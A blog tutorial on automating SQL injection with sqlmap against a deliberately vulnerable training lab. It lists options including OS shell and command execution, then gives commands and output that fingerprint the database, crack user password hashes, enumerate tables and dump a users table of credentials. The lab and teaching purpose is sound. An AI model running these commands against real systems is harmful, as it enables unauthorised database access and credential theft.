i Hacking SQL injection with SQLmap – All things in moderation

Hacking SQL injection with SQLmap

SQLmap is one of the most powerful SQL injection automating tool written in python. It’s automate detecting and exploiting database server, extracting database names, tables, columns, all the data in the tables.

Features:

  1. Support for database management systems:
    • MySQL
    • Oracle
    • PostgreSQL
    • Microsoft SQL Server
    • Microsoft Access
    • SQLite
    • Firebird
    • Sybase
    • SAP MaxDB
    • DB2
  2. Full support for six SQL injection techniques:
    • Boolean-based blind
    • Time-based blind
    •  Error-based
    •  UNION query
    • Stacked queries
    •  Out-of-band.
  3. Support to directly connect to the database without passing via a SQL injection, by providing DBMS credentials, IP address, port and database name.
  4. Support to enumerate users, password hashes, privileges, roles, databases, tables and columns.
  5. Automatic brute force password hash formats using directory.
  6. Support to dump database tables entries.
  7. Support to search for specific database names, specific tables across all databases or specific columns across all databases’ tables. This is useful, for instance, to identify tables containing custom application credentials where relevant columns’ names contain string like name and pass.
  8. Support to download and upload file from the database server underlying file system when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  9. Support to execute commands, system shell when the database software is MySQL, PostgreSQL or Microsoft SQL Server.
  10. Support to establish an out-of-band stateful TCP connection between the attacker machine and the database server underlying operating system. This channel can be an interactive command prompt, a Meterpreter session or a graphical user interface (VNC) session as per user’s choice.
  11. Support for database process’ user privilege escalation via Metasploit’s Meterpreter getsystem command.

OPTIONS:

-u URL, –url=URL : target url
–user-agent=USER-AGENT : user agent for connection
–cookie=COOKIE : cookie for connection
–method=METHOD : Force usage of given HTTP method (e.g. GET, POST)
–data=DATA : Data to be sent through HTTP POST method
-f, –fingerprint : Perform an extensive DBMS version fingerprint
-b, –banner : Retrieve DBMS banner
–current-user : Retrieve DBMS current user
–current-db : Retrieve DBMS current db
–users : Enumerate database users
–passwords : Enumerate DBMS users password hashes
–tables : Enumerate DBMS schema
–dbs : Enumerate DBMS database
–tables : Enumerate DBMS database tables
–columns : Enumerate DBMS database tables columns
-D db_name : DBMS database(s) to enumerate
-T table_name : DBMS database tables(s) to enumerate
-C column_name : DBMS database table column(s) to enumerate
–dump : dump data in table entries
–os-shell : Prompt for an interactive operating system shell
–os-cmd : Execute an operating system command
-v : Verbosity level

  • 0: Show only Python tracebacks, error and critical messages.
  • 1: Show also information and warning messages.
  • 2: Show also debug messages.
  • 3: Show also payloads injected.
  • 4: Show also HTTP requests.
  • 5: Show also HTTP responses’ headers.
  • 6: Show also HTTP responses’ page content.

Read more options: https://github.com/sqlmapproject/sqlmap/wiki/Usage

I. Example usage SQLmap injection in URL parameter

1. Fingerprint the back-end DBS, enumerate banner, current user, current database, all users, users’ passwords hashes.

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 -f -b --current-db --current-user --users --passwords -v 1

Here is output:

[19:47:11] [INFO] resumed: 5.1.41-3ubuntu12.6-log
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: active fingerprint: MySQL >= 5.1.12 and < 5.5.0
               comment injection fingerprint: MySQL 5.1.41 
               banner parsing fingerprint: MySQL 5.1.41, logging enabled banner: '5.1.41-3ubuntu12.6-log' 
[19:47:11] [INFO] resumed: [email protected] 
current user: '[email protected]' 
[19:47:11] [INFO] resumed: security 
current database: 'security' 
database management system users [4]: 
[*] 'bricks'@'%' 
[*] 'bwapp'@'%' 
[*] 'citizens'@'localhost' 
[*] 'cryptomg'@'%' ' 
do you want to store hashes to a temporary file for eventual further processing with other tools
[y/N] y do you want to perform a dictionary-based attack against retrieved password hashes
[Y/n/q] y what dictionary do you want to use? 
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter) 
[2] custom dictionary file 
[3] file with list of dictionary files 
> 
do you want to use common password suffixes? (slow!) [y/N] 
database management system users password hashes:                                                                                               
[*] bricks [1]:
    password hash: *73316569DAC7839C2A784FF263F5C0ABBC7086E2
[*] bwapp [1]:
    password hash: *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F
    clear-text password: user
[*] citizens [1]:
    password hash: *F70658E9BDD2910AC33ACDA164605DFC1DA70A68
    clear-text password: joomla
[*] cryptomg [1]:
    password hash: *D5D9F81F5542DE067FFF5FF7A4CA4BDD322C578F
    clear-text password: user

2. Enumerate Databases

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=11 --dbs -v 1

Here is output:

[21:24:00] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu 10.04 (Lucid Lynx)
web application technology: PHP 5.3.2, Apache 2.2.14
back-end DBMS: MySQL 5
[21:24:00] [INFO] fetching database names
[21:24:00] [WARNING] the SQL query provided does not return any output
[21:24:00] [INFO] the SQL query used returns 36 entries
available databases [4]:
[*] .svn
[*] bricks
[*] bwapp
[*] challenges

3. Get tables in a database

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 --tables -D bricks -v 1

Here is output:

Database: bricks
[1 table]
+-------+
| users |
+-------+

4. Get columns of a table

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 --columns -T users -D bricks -v 1

Here is output:

Database: bricks
Table: users
[8 columns]
+----------+--------------+
| Column   | Type         |
+----------+--------------+
| email    | varchar(45)  |
| host     | varchar(45)  |
| idusers  | int(11)      |
| lang     | varchar(45)  |
| name     | varchar(45)  |
| password | varchar(45)  |
| ref      | varchar(145) |
| ua       | varchar(45)  |
+----------+--------------+


5. Dump data from table

sqlmap -u http://172.16.76.132/sqli_labs/Less-1/?id=1 -T users -D bricks --dump -v 1

Here is output:

Database: bricks
Table: users
[4 entries]
+---------+---------------+---------------------------------------------+------+-------+-------------+---------------------+---------------------------------------------+
| idusers | ua            | ref                                         | lang | name  | host        | email               | password                                    |
+---------+---------------+---------------------------------------------+------+-------+-------------+---------------------+---------------------------------------------+
| 0       | Brick_Browser | http://owaspbwa/bricks/content-13/index.php | en   | admin | 127.0.0.1   | [email protected] | admin                                       |
| 1       | Block_Browser |                                             | en   | tom   | 8.8.8.8     | [email protected]   | tom                                         |
| 2       | Rain_Browser  |                                             | en   | ron   | 192.168.1.1 | [email protected]   | ron                                         |
| 3       | Mantra        |                                             | en   | harry | 127.0.0.1   | [email protected] | 5f4dcc3b5aa765d61d8327deb882cf99 (password) |
+---------+---------------+---------------------------------------------+------+-------+-------------+---------------------+---------------------------------------------+

Leave a Reply